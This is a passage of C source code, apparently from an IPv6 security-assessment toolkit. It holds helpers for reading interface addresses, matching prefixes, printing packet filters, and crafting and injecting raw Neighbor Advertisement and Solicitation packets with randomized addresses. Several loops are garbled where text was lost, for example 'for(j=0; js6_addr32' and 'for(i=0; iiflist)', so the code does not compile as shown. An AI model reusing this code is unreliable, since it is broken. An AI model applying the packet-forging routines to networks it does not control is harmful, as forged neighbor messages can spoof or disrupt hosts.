sockpptr->sdl_nlen), ETHER_ADDR_LEN); idata->ether_flag=TRUE; } } } #endif else if((ptr->ifa_addr)->sa_family == AF_INET6){ sockin6ptr= (struct sockaddr_in6 *) (ptr->ifa_addr); if( !(idata->ip6_local_flag) && IN6_IS_ADDR_LINKLOCAL(&(sockin6ptr->sin6_addr))){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ idata->ip6_local = sockin6ptr->sin6_addr; #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__) /* BSDs store the interface index in s6_addr16[1], so we must clear it */ idata->ip6_local.s6_addr16[1] =0; idata->ip6_local.s6_addr16[2] =0; idata->ip6_local.s6_addr16[3] =0; #endif idata->ip6_local_flag= TRUE; } } else if(!IN6_IS_ADDR_LINKLOCAL(&(sockin6ptr->sin6_addr))){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ if(IN6_IS_ADDR_LOOPBACK(&(sockin6ptr->sin6_addr))) idata->flags = IFACE_LOOPBACK; if(!is_ip6_in_prefix_list( &(sockin6ptr->sin6_addr), &(idata->ip6_global))){ if(idata->ip6_global.nprefix < idata->ip6_global.maxprefix){ if( (idata->ip6_global.prefix[idata->ip6_global.nprefix] = \ malloc(sizeof(struct prefix_entry))) == NULL){ if(idata->verbose_f > 1) puts("Error while storing Source Address"); freeifaddrs(ifptr); return(-1); } (idata->ip6_global.prefix[idata->ip6_global.nprefix])->len = 64; (idata->ip6_global.prefix[idata->ip6_global.nprefix])->ip6 = sockin6ptr->sin6_addr; idata->ip6_global.nprefix++; idata->ip6_global_flag= TRUE; } } } } } /* else if((ptr->ifa_addr)->sa_family == AF_INET){ if(strncmp(idata->iface, ptr->ifa_name, IFACE_LENGTH-1) == 0){ idata->ip6_local = sockin6ptr->sin6_addr; } } */ } freeifaddrs(ifptr); return(0); } /* * Function: is_ip6_in_address_list() * * Checks whether an IPv6 address is present in an address list. */ int is_ip6_in_address_list(struct prefix_list *plist, struct in6_addr *target){ unsigned int i, j; for(i=0; i < plist->nprefix; i++){ for(j=0; j<4; j++){ if(target->s6_addr32[j] != (plist->prefix[i])->ip6.s6_addr32[j]) break; } if(j == 4) return TRUE; } return FALSE; } /* * Function: is_ip6_in_list() * * Checks whether an IPv6 address is present in an address list. */ int is_ip6_in_prefix_list(struct in6_addr *target, struct prefix_list *plist){ unsigned int i, j, full32, rest32; uint32_t mask32; for(i=0; i < plist->nprefix; i++){ full32=(plist->prefix[i])->len / 32; rest32=(plist->prefix[i])->len % 32; mask32 = 0xffffffff; for(j=0; j < full32; j++) if(target->s6_addr32[j] != (plist->prefix[i])->ip6.s6_addr32[j]) break; if(j == full32){ if(rest32 == 0) return TRUE; else{ mask32 = mask32 << (32 - rest32); if( (target->s6_addr32[full32] & htonl(mask32)) == ((plist->prefix[i])->ip6.s6_addr32[full32] & htonl(mask32))) return TRUE; } } } return FALSE; } /* * Function: is_time_elapsed() * * Checks whether a specific amount of time has elapsed. (i.e., whether curtime >= lastprobe + delta */ int is_time_elapsed(struct timeval *curtime, struct timeval *lastprobe, unsigned long delta){ if( curtime->tv_sec > (lastprobe->tv_sec + delta / 1000000) ){ return(1); }else if( curtime->tv_sec == (lastprobe->tv_sec + delta / 1000000)){ if( curtime->tv_usec >= (lastprobe->tv_usec + delta % 1000000) ){ return(1); } } return(0); } /* * match_ipv6_to_prefixes() * * Finds out whether an IPv6 address matches any IPv6 prefix in an array */ int match_ipv6_to_prefixes(struct in6_addr *ipv6addr, struct prefix_list *pf){ unsigned int i, j, full32, rbits; uint32_t mask; for(i=0; i < pf->nprefix; i++){ full32= (pf->prefix[i])->len/32; for(j=0; js6_addr32[j] != (pf->prefix[i])->ip6.s6_addr32[j]) break; } if(j == full32){ if((rbits= (pf->prefix[i])->len%32) == 0) return TRUE; else{ mask= 0xffffffff; mask= mask<prefix[i])->ip6.s6_addr32[full32] == (ipv6addr->s6_addr32[full32] & htonl(mask))) return TRUE; } } } return FALSE; } /* * Function: print_filters() * * Prints the filters that will be applied to incoming packets. */ void print_filters(struct iface_data *idata, struct filters *filters){ unsigned int i; char plinkaddr[ETHER_ADDR_PLEN]; char pv6addr[INET6_ADDRSTRLEN]; if(filters->nblocksrc){ printf("Block filter for IPv6 Source Addresss: "); for(i=0; i< filters->nblocksrc; i++){ if(inet_ntop(AF_INET6, &(filters->blocksrc[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Src. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->blocksrclen[i]); } printf("\n"); } if(filters->nblockdst){ printf("Block filter for IPv6 Destination Address: "); for(i=0; i< filters->nblockdst; i++){ if(inet_ntop(AF_INET6, &(filters->blockdst[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Dst. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->blockdstlen[i]); } printf("\n"); } if(filters->nblocktarget){ printf("Block filter for Target Address: "); for(i=0; i< filters->nblocktarget; i++){ if(inet_ntop(AF_INET6, &(filters->blocktarget[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Target Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->blocktargetlen[i]); } printf("\n"); } if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(filters->nblocklinksrc){ printf("Block filter for link-layer Source Address: "); for(i=0; i < filters->nblocklinksrc; i++){ if(ether_ntop(&(filters->blocklinksrc[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } if(filters->nblocklinkdst){ printf("Block filter for link-layer Destination Address: "); for(i=0; i < filters->nblocklinkdst; i++){ if(ether_ntop(&(filters->blocklinkdst[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } } if(filters->nacceptsrc){ printf("Accept filter for IPv6 Source Addresss: "); for(i=0; i < filters->nacceptsrc; i++){ if(inet_ntop(AF_INET6, &(filters->acceptsrc[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Src. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->acceptsrclen[i]); } printf("\n"); } if(filters->nacceptdst){ printf("Accept filter for IPv6 Destination Address: "); for(i=0; i < filters->nacceptdst; i++){ if(inet_ntop(AF_INET6, &(filters->acceptdst[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Dst. Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->acceptdstlen[i]); } printf("\n"); } if(filters->naccepttarget){ printf("Accept filter for Target Address: "); for(i=0; i < filters->naccepttarget; i++){ if(inet_ntop(AF_INET6, &(filters->accepttarget[i]), pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Target Addr. filter to presentation format"); exit(EXIT_FAILURE); } printf("%s/%u ", pv6addr, filters->accepttargetlen[i]); } printf("\n"); } if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(filters->nacceptlinksrc){ printf("Accept filter for link-layer Source Address: "); for(i=0; i < filters->nacceptlinksrc; i++){ if(ether_ntop(&(filters->acceptlinksrc[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } if(filters->nacceptlinkdst){ printf("Accept filter for link-layer Destination Address: "); for(i=0; i < filters->nacceptlinkdst; i++){ if(ether_ntop(&(filters->acceptlinkdst[i]), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("%s ", plinkaddr); } printf("\n"); } } } /* * Function: print_filter_result() * * Prints infromation about an incoming packet and whether it was blocked or * accepted by a filter. */ void print_filter_result(struct iface_data *idata, const u_char *pkt_data, unsigned char fresult){ struct ip6_hdr *pkt_ipv6; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN]; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_data + idata->linkhsize); if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_src), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(inet_ntop(AF_INET6, &(pkt_ipv6->ip6_dst), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("Received IPv6 packet from %s to %s (%s)\n", psrcaddr, pdstaddr, \ ((fresult == ACCEPTED)?"accepted":"blocked") ); } /* * randomize_ether_addr() * * Select a random Ethernet address. */ void randomize_ether_addr(struct ether_addr *ethaddr){ unsigned int i; for(i=0; i<6; i++) ethaddr->a[i]= random(); ethaddr->a[0]= (ethaddr->a[0] & 0xfc) | 0x02; } /* * randomize_ipv6_addr() * * Select a random IPv6 from a given prefix. */ void randomize_ipv6_addr(struct in6_addr *ipv6addr, struct in6_addr *prefix, uint8_t preflen){ uint32_t mask; uint8_t startrand; unsigned int i; startrand= preflen/32; for(i=startrand; i<4; i++) ipv6addr->s6_addr32[i]=random(); if(preflen%32){ mask=0xffffffff; for(i=0; i<(preflen%32); i++) mask= mask>>1; ipv6addr->s6_addr32[startrand]= ipv6addr->s6_addr32[startrand] & htonl(mask); } for(i=0; i<=(preflen/32); i++) ipv6addr->s6_addr32[i]= ipv6addr->s6_addr32[i] | prefix->s6_addr32[i]; } /* * release_privileges() * * Releases superuser privileges by switching to the real uid and gid, or to nobody */ void release_privileges(void){ uid_t ruid; gid_t rgid; struct passwd *pwdptr; /* If the real UID is not root, we setuid() and setgid() to that user and group, releasing superuser privileges. Otherwise, if the real UID is 0, we try to setuid() to "nobody", releasing superuser privileges. */ if( (ruid=getuid()) && (rgid=getgid())){ if(setgid(rgid) == -1){ puts("Error while releasing superuser privileges (changing to real GID)"); exit(EXIT_FAILURE); } if(setuid(ruid) == -1){ puts("Error while releasing superuser privileges (changing to real UID)"); exit(EXIT_FAILURE); } } else{ if((pwdptr=getpwnam("nobody"))){ if(!pwdptr->pw_uid || !pwdptr->pw_gid){ puts("User 'nobody' has incorrect privileges"); exit(EXIT_FAILURE); } if(setgid(pwdptr->pw_gid) == -1){ puts("Error while releasing superuser privileges (changing to nobody's group)"); exit(EXIT_FAILURE); } if(setuid(pwdptr->pw_uid) == -1){ puts("Error while releasing superuser privileges (changing to 'nobody')"); exit(EXIT_FAILURE); } } } } /* * sanitize_ipv6_prefix() * * Clears those bits in an IPv6 address that are not within a prefix length. */ void sanitize_ipv6_prefix(struct in6_addr *ipv6addr, uint8_t prefixlen){ unsigned int skip, i; uint32_t mask; skip= (prefixlen+31)/32; if(prefixlen%32){ mask=0; for(i=0; i<(prefixlen%32); i++) mask= (mask>>1) | 0x80000000; ipv6addr->s6_addr32[skip-1]= ipv6addr->s6_addr32[skip-1] & htonl(mask); } for(i=skip;i<4;i++) ipv6addr->s6_addr32[i]=0; } /* * Handler for the ALARM signal. * * Used for setting a timeout on libpcap reads */ void sig_alarm(int num){ if(canjump == 0) return; siglongjmp(env, 1); } /* * Function: src_addr_sel2() * * Selects a Source Address for a given Destination Address (old function) */ struct in6_addr *sel_src_addr_ra(struct iface_data *idata, struct in6_addr *dst){ uint32_t mask32; unsigned int i, j, full32, rest32; /* If the destination address is a link-local address, we select our link-local address as the Source Address. If the dst address is a global unicast address we select our first matching address, or else our first global address. Worst case scenario, we don't have global address and must use our link-local address. */ if(IN6_IS_ADDR_LINKLOCAL(dst)){ return( &(idata->ip6_local)); } else if(IN6_IS_ADDR_MC_LINKLOCAL(dst) || IN6_IS_ADDR_LINKLOCAL(dst)){ return( &(idata->ip6_local)); } else if(idata->ip6_global_flag){ for(i=0; i < idata->ip6_global.nprefix; i++){ full32=(idata->ip6_global.prefix[i])->len / 32; rest32=(idata->ip6_global.prefix[i])->len % 32; mask32 = 0xffffffff; for(j=0; j < full32; j++) if( dst->s6_addr32[j] != (idata->ip6_global.prefix[i])->ip6.s6_addr32[j]) break; if( (j == full32) && rest32){ mask32 = mask32 << (32 - rest32); if( (dst->s6_addr32[full32] & htonl(mask32)) == ((idata->ip6_global.prefix[i])->ip6.s6_addr32[full32] & htonl(mask32))) return( &((idata->ip6_global.prefix[i])->ip6)); } } return( &((idata->ip6_global.prefix[0])->ip6)); } /* else */ return( &(idata->ip6_local)); } /* * Function: send_neighbor_advertisement() * * Send a Neighbor advertisement in response to a Neighbor Solicitation message */ int send_neighbor_advert(struct iface_data *idata, pcap_t *pfd, const u_char *pktdata){ unsigned int i; size_t nw; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct nd_neighbor_solicit *pkt_ns; unsigned char *ptr; struct ether_header *ethernet; unsigned char *v6buffer; struct ip6_hdr *ipv6; struct nd_neighbor_advert *na; struct nd_opt_tlla *tllaopt; struct in6_addr *pkt_ipv6addr; unsigned char wbuffer[2500]; if(idata->mtu > sizeof(wbuffer)){ if(idata->verbose_f) puts("send_neighbor_advert(): Internal buffer too small"); return(-1); } ethernet= (struct ether_header *) wbuffer; v6buffer = (unsigned char *) ethernet + sizeof(struct ether_header); ipv6 = (struct ip6_hdr *) v6buffer; na= (struct nd_neighbor_advert *) ((char *) v6buffer + MIN_IPV6_HLEN); ptr = (unsigned char *) na; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + ETHER_HDR_LEN); pkt_ns = (struct nd_neighbor_solicit *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); ethernet->ether_type = htons(ETHERTYPE_IPV6); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_nxt= IPPROTO_ICMPV6; if( (ptr+sizeof(struct nd_neighbor_advert)) > (v6buffer+idata->mtu)){ if(idata->verbose_f) puts("send_neighbor_advert(): Packet too large when sending Neighbor Advertisement"); return(-1); } na->nd_na_type = ND_NEIGHBOR_ADVERT; na->nd_na_code = 0; ptr += sizeof(struct nd_neighbor_advert); if( (ptr+sizeof(struct nd_opt_tlla)) <= (v6buffer+idata->mtu) ){ tllaopt = (struct nd_opt_tlla *) ptr; tllaopt->type= ND_OPT_TARGET_LINKADDR; tllaopt->length= TLLA_OPT_LEN; memcpy(tllaopt->address, idata->ether.a, ETH_ALEN); ptr += sizeof(struct nd_opt_tlla); } else{ if(idata->verbose_f) puts("send_neighbor_advert(): Packet Too Large while inserting TLLA option in NA message"); return(-1); } /* If the IPv6 Source Address of the incoming Neighbor Solicitation is the unspecified address (::), the Neighbor Advertisement must be directed to the IPv6 all-nodes multicast address (and the Ethernet Destination address should be 33:33:33:00:00:01). Otherwise, the Neighbor Advertisement is sent to the IPv6 Source Address (and Ethernet Source Address) of the incoming Neighbor Solicitation message */ pkt_ipv6addr = &(pkt_ipv6->ip6_src); if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr)){ na->nd_na_flags_reserved = 0; if ( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(ipv6->ip6_dst)) <= 0){ if(idata->verbose_f) puts("send_neighbor_advert(): Error converting all-nodes multicast address"); return(-1); } if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(ethernet->dst), ETHER_ADDR_LEN) == 0){ if(idata->verbose_f) puts("send_neighbor_advert(): Error converting all-nodes link-local address"); return(-1); } } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; ethernet->dst = pkt_ether->src; /* Set the "Solicited" flag if NS was sent from an address other than the unspecified address (i.e., the response will be unicast). */ na->nd_na_flags_reserved = ND_NA_FLAG_OVERRIDE | ND_NA_FLAG_SOLICITED; } ethernet->src = idata->ether; /* If the Neighbor Solicitation message was directed to one of our unicast addresses, the IPv6 Source Address is set to that address. Otherwise, we set the IPv6 Source Address to our link-local address. */ pkt_ipv6addr = &(pkt_ipv6->ip6_dst); if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ ipv6->ip6_src = idata->ip6_local; } else{ if(is_eq_in6_addr(pkt_ipv6addr, &(idata->ip6_local))){ ipv6->ip6_src = idata->ip6_local; } else if(idata->ip6_global_flag){ for(i=0; i < idata->ip6_global.nprefix; i++){ if(is_eq_in6_addr(pkt_ipv6addr, &((idata->ip6_global.prefix[i])->ip6))){ ipv6->ip6_src = (idata->ip6_global.prefix[i])->ip6; break; } } if(i == idata->ip6_global.nprefix) return 0; } else{ return 0; } } na->nd_na_target= pkt_ns->nd_ns_target; na->nd_na_cksum = 0; na->nd_na_cksum = in_chksum(v6buffer, na, ptr-((unsigned char *)na), IPPROTO_ICMPV6); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(pfd, wbuffer, ptr - wbuffer)) == -1){ if(idata->verbose_f) printf("send_neighbor_advert(): pcap_inject(): %s", pcap_geterr(pfd)); return(-1); } if(nw != (ptr-wbuffer)){ if(idata->verbose_f) printf("send_neighbor_advert(): pcap_inject(): only wrote %lu bytes " "(rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-wbuffer)); return(-1); } return 0; } /* * Function: string_escapes() * * Replace some escape sequences in a string */ int string_escapes(char *data, unsigned int *datalen, unsigned int maxlen){ char *org, *dst; org=data; dst=data; while(org < (data+ *datalen) && dst <= (data+maxlen)){ if(*org == '\\'){ if((org+1) < (data+ *datalen)){ org++; switch(*org){ case '\\': *dst= '\\'; break; case 'n': *dst= CHAR_LF; break; case 'r': *dst= CHAR_CR; break; default: return 0; } } else *dst= *org; } else{ if(org != dst) *dst = *org; } org++; dst++; } *datalen= dst - data; return 1; } /* * Function: Strnlen() * * Our own version of strnlen(), since some OSes do not support it. */ size_t Strnlen(const char *s, size_t maxlen){ size_t i=0; while(s[i] != 0 && i < maxlen) i++; if(i < maxlen) return(i); else return(maxlen); } /* * Function: init_iface_data() * * Initializes the contents of "iface_data" structure */ int init_iface_data(struct iface_data *idata){ unsigned int i; memset(idata, 0, sizeof(struct iface_data)); idata->mtu= ETH_DATA_LEN; idata->local_retrans = 0; idata->local_timeout = 1; if( (idata->ip6_global.prefix= malloc(MAX_LOCAL_ADDRESSES * sizeof(struct prefix_entry *))) == NULL) return(FAILURE); idata->ip6_global.nprefix=0; idata->ip6_global.maxprefix= MAX_LOCAL_ADDRESSES; if( (idata->prefix_ol.prefix= malloc(MAX_PREFIXES_ONLINK * sizeof(struct prefix_entry *))) == NULL) return(FAILURE); idata->prefix_ol.nprefix= 0; idata->prefix_ol.maxprefix= MAX_PREFIXES_ONLINK; if( (idata->prefix_ac.prefix= malloc(MAX_PREFIXES_AUTO * sizeof(struct prefix_entry *))) == NULL) return(FAILURE); idata->prefix_ac.nprefix= 0; idata->prefix_ac.maxprefix= MAX_PREFIXES_AUTO; if( ((idata->iflist).ifaces= malloc(sizeof(struct iface_entry) * MAX_IFACES)) == NULL) return(FAILURE); memset((idata->iflist).ifaces, 0, sizeof(struct iface_entry) * MAX_IFACES); idata->iflist.nifaces=0; idata->iflist.maxifaces= MAX_IFACES; for(i=0; iiflist).ifaces[i].ip6_global.prefix= malloc( sizeof(struct prefix_entry *) * MAX_LOCAL_ADDRESSES)) == NULL){ return(FAILURE); } (idata->iflist).ifaces[i].ip6_global.maxprefix= MAX_LOCAL_ADDRESSES; if( ((idata->iflist).ifaces[i].ip6_local.prefix= malloc( sizeof(struct prefix_entry *) * MAX_LOCAL_ADDRESSES)) == NULL){ return(FAILURE); } (idata->iflist).ifaces[i].ip6_local.maxprefix= MAX_LOCAL_ADDRESSES; } return SUCCESS; } /* * Function: init_filters() * * Initializes a filters structure, and allocates memory for the filter data. */ int init_filters(struct filters *filters){ memset(filters, 0, sizeof(struct filters)); if( (filters->blocksrc= malloc(sizeof(struct in6_addr) * MAX_BLOCK_SRC)) == NULL) return(-1); if( (filters->blockdst= malloc(sizeof(struct in6_addr) * MAX_BLOCK_DST)) == NULL) return(-1); if( (filters->blocktarget= malloc(sizeof(struct in6_addr) * MAX_BLOCK_TARGET)) == NULL) return(-1); if( (filters->blocklinksrc= malloc(sizeof(struct ether_addr) * MAX_BLOCK_LINK_SRC)) == NULL) return(-1); if( (filters->blocklinkdst= malloc(sizeof(struct ether_addr) * MAX_BLOCK_LINK_DST)) == NULL) return(-1); if( (filters->blocksrclen= malloc(sizeof(uint8_t) * MAX_BLOCK_SRC)) == NULL) return(-1); if( (filters->blockdstlen= malloc(sizeof(uint8_t) * MAX_BLOCK_DST)) == NULL) return(-1); if( (filters->blocktargetlen= malloc(sizeof(uint8_t) * MAX_BLOCK_TARGET)) == NULL) return(-1); if( (filters->acceptsrc= malloc(sizeof(struct in6_addr) * MAX_ACCEPT_SRC)) == NULL) return(-1); if( (filters->acceptdst= malloc(sizeof(struct in6_addr) * MAX_ACCEPT_DST)) == NULL) return(-1); if( (filters->accepttarget= malloc(sizeof(struct in6_addr) * MAX_ACCEPT_TARGET)) == NULL) return(-1); if( (filters->acceptlinksrc= malloc(sizeof(struct ether_addr) * MAX_ACCEPT_LINK_SRC)) == NULL) return(-1); if( (filters->acceptlinkdst= malloc(sizeof(struct ether_addr) * MAX_ACCEPT_LINK_DST)) == NULL) return(-1); if( (filters->acceptsrclen= malloc(sizeof(uint8_t) * MAX_ACCEPT_SRC)) == NULL) return(-1); if( (filters->acceptdstlen= malloc(sizeof(uint8_t) * MAX_ACCEPT_DST)) == NULL) return(-1); if( (filters->accepttargetlen= malloc(sizeof(uint8_t) * MAX_ACCEPT_TARGET)) == NULL) return(-1); return(0); } /* * Function: sel_next_hop_ra() * * Performs next hop determination by sending the necessary packets * */ int sel_next_hop_ra(struct iface_data *idata){ /* Select link-layer destination address + If the underlying interface is loopback or tunnel, there is no need to select a link-layer destination address + If a link-layer Destination Address has been specified, we do not need to select one + If the destination address is link-local, there is no need to perform next-hop determination + Otherwise we need to learn the local router or do ND as a last ressort */ if((idata->type == DLT_EN10MB && (!(idata->flags & IFACE_LOOPBACK) && !(idata->flags & IFACE_TUNNEL))) && \ (!(idata->hdstaddr_f) && idata->dstaddr_f)){ if(IN6_IS_ADDR_LINKLOCAL(&(idata->dstaddr))){ /* If the IPv6 Destination Address is a multicast address, there is no need to perform Neighbor Discovery */ if(IN6_IS_ADDR_MC_LINKLOCAL(&(idata->dstaddr))){ idata->hdstaddr= ether_multicast(&(idata->dstaddr)); } else if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ if(idata->verbose_f) puts("Error while performing Neighbor Discovery for the Destination Address"); return(-1); } } else if(find_ipv6_router_full(idata->pfd, idata) == 1){ if(match_ipv6_to_prefixes(&(idata->dstaddr), &(idata->prefix_ol))){ /* If address is on-link, we must perform Neighbor Discovery */ if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ if(idata->verbose_f) puts("Error while performing Neighbor Discovery for the Destination Address"); return(-1); } } else{ idata->hdstaddr= idata->router_ether; } } else{ if(idata->verbose_f) puts("Couldn't find local router. Now trying Neighbor Discovery for the target node"); /* * If we were not able to find a local router, we assume the destination is "on-link" (as * a last ressort), and thus perform Neighbor Discovery for that destination */ if(ipv6_to_ether(idata->pfd, idata, &(idata->dstaddr), &(idata->hdstaddr)) != 1){ if(idata->verbose_f) puts("Error while performing Neighbor Discovery for the Destination Address"); return(-1); } } } return(0); } /* * Function: inc_sdev() * * Computes the average increment and standard deviation of an array of uint32_t's. * The function computes the aforementioned values for network byte order and host byte order, * and returns as a result the set of values with smaller standard deviation. */ int inc_sdev(uint32_t *s, unsigned int n, uint32_t *diff_avg, double *diff_sdev){ unsigned int i; uint32_t *diff, *s2; unsigned long long int diff1_avg, diff2_avg; double diff1_sdev, diff2_sdev; if( (diff=malloc((n-1)*sizeof(uint32_t))) == NULL) return(-1); diff1_avg= 0; for(i=0; i<(n-1); i++){ diff[i]= s[i+1]-s[i]; diff1_avg+= diff[i]; } diff1_avg= diff1_avg/(n-1); diff1_sdev= 0; for(i=0; i<(n-1); i++) diff1_sdev= diff1_sdev + (diff[i] - diff1_avg) * (diff[i] - diff1_avg); diff1_sdev= sqrt(diff1_sdev/(n-2)); if( (s2=malloc(n * sizeof(uint32_t))) == NULL) return(-1); memcpy(s2, s, n * sizeof(uint32_t)); change_endianness(s2, n); diff2_avg= 0; for(i=0; i<(n-1); i++){ diff[i]= s2[i+1]-s2[i]; diff2_avg+= diff[i]; } diff2_avg= diff2_avg/(n-1); diff2_sdev= 0; for(i=0; i<(n-1); i++) diff2_sdev= diff2_sdev + (diff[i] - diff2_avg) * (diff[i] - diff2_avg); diff2_sdev= sqrt(diff2_sdev/(n-2)); free(diff); free(s2); if(diff1_sdev <= diff2_sdev){ *diff_avg= (uint32_t) diff1_avg; *diff_sdev= diff1_sdev; } else{ *diff_avg= (uint32_t) diff2_avg; *diff_sdev= diff2_sdev; } return(0); } /* * Function: change_endianness() * * Changes the endianness of an array of uint32_t's */ void change_endianness(uint32_t *s, unsigned int n){ unsigned int i; union { uint32_t ui; unsigned char c[4]; } swapper; unsigned char c; for(i=0; imtu; ether = (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; ether->src = idata->ether; ether->dst = ether_multicast(&(ipv6->ip6_dst)); ether->ether_type = htons(ETHERTYPE_IPV6); ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= 255; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= solicited_node(&(idata->dstaddr)); prev_nh = (unsigned char *) &(ipv6->ip6_nxt); *prev_nh = IPPROTO_ICMPV6; ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if( (ptr+sizeof(struct nd_neighbor_solicit)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("Packet too large while inserting Neighbor Solicitation header"); return(-1); } ns= (struct nd_neighbor_solicit *) (ptr); ns->nd_ns_type = ND_NEIGHBOR_SOLICIT; ns->nd_ns_code = 0; ns->nd_ns_reserved = 0; ns->nd_ns_target = *target; ptr += sizeof(struct nd_neighbor_solicit); sllaopt = (struct nd_opt_slla *) ptr; if( (ptr+sizeof(struct nd_opt_slla)) > (v6buffer+ns_max_packet_size)){ if(idata->verbose_f>1) puts("NS message too large while processing source link-layer addresss opt."); return(-1); } sllaopt->type= ND_OPT_SOURCE_LINKADDR; sllaopt->length= SLLA_OPT_LEN; memcpy(sllaopt->address, &(idata->ether.a), ETH_ALEN); ptr += sizeof(struct nd_opt_slla); ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); ns->nd_ns_cksum = 0; ns->nd_ns_cksum = in_chksum(v6buffer, ns, ptr-((unsigned char *)ns), IPPROTO_ICMPV6); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ if(idata->verbose_f>1) printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr-buffer)){ if(idata->verbose_f > 1) printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, \ (LUI) (ptr-buffer)); return(-1); } return 0; } #ifdef __linux__ /* * Function: sel_next_hop() * * Find the next hop for a target destination */ int sel_next_hop(struct iface_data *idata){ int sockfd; struct sockaddr_nl addr, them; int ret; pid_t pid; char reply[MAX_NLPAYLOAD]; struct msghdr msg; struct iovec iov; struct nlrequest req; struct nlmsghdr *nlp; struct rtmsg *rtp; struct rtattr *rtap; int nll,rtl; unsigned char skip_f; #ifdef DEBUG puts("DEBUG: BEGIN sel_next_hop()"); #endif if( (sockfd=socket(AF_NETLINK,SOCK_RAW,NETLINK_ROUTE)) == -1){ if(idata->verbose_f) puts("Error in socket()"); return(FAILURE); } memset((void *)&addr, 0, sizeof(addr)); addr.nl_family = AF_NETLINK; addr.nl_pid = pid= getpid(); addr.nl_groups = RTMGRP_IPV6_ROUTE; if(bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != 0){ if(idata->verbose_f) puts("Error in bind()"); close(sockfd); return(FAILURE); } memset(&req, 0, sizeof(req)); req.nl.nlmsg_len = NLMSG_LENGTH(sizeof(struct rtmsg)); req.nl.nlmsg_flags = NLM_F_REQUEST; req.nl.nlmsg_type = RTM_GETROUTE; req.rt.rtm_family= AF_INET6; rtap = (struct rtattr *) req.buf; /* Destination Address */ if(idata->dstaddr_f){ #ifdef DEBUG print_ipv6_address("DEBUG Req RTA_DST: ", &(idata->dstaddr)); #endif rtap->rta_type = RTA_DST; rtap->rta_len = RTA_SPACE(sizeof(idata->dstaddr)); memcpy(RTA_DATA(rtap), &(idata->dstaddr), sizeof(idata->dstaddr)); req.nl.nlmsg_len += rtap->rta_len; } /* Source Address */ if(idata->srcaddr_f){ #ifdef DEBUG print_ipv6_address("DEBUG Req RTA_SRC: ", &(idata->srcaddr)); #endif rtap = (struct rtattr *)((char *)rtap + (rtap->rta_len)); rtap->rta_type = RTA_SRC; rtap->rta_len = RTA_SPACE(sizeof(idata->srcaddr)); memcpy(RTA_DATA(rtap), &(idata->srcaddr), sizeof(idata->srcaddr)); req.nl.nlmsg_len += rtap->rta_len; } /* address it */ memset(&them, 0, sizeof(them)); them.nl_family = AF_NETLINK; memset(&msg, 0, sizeof(msg)); 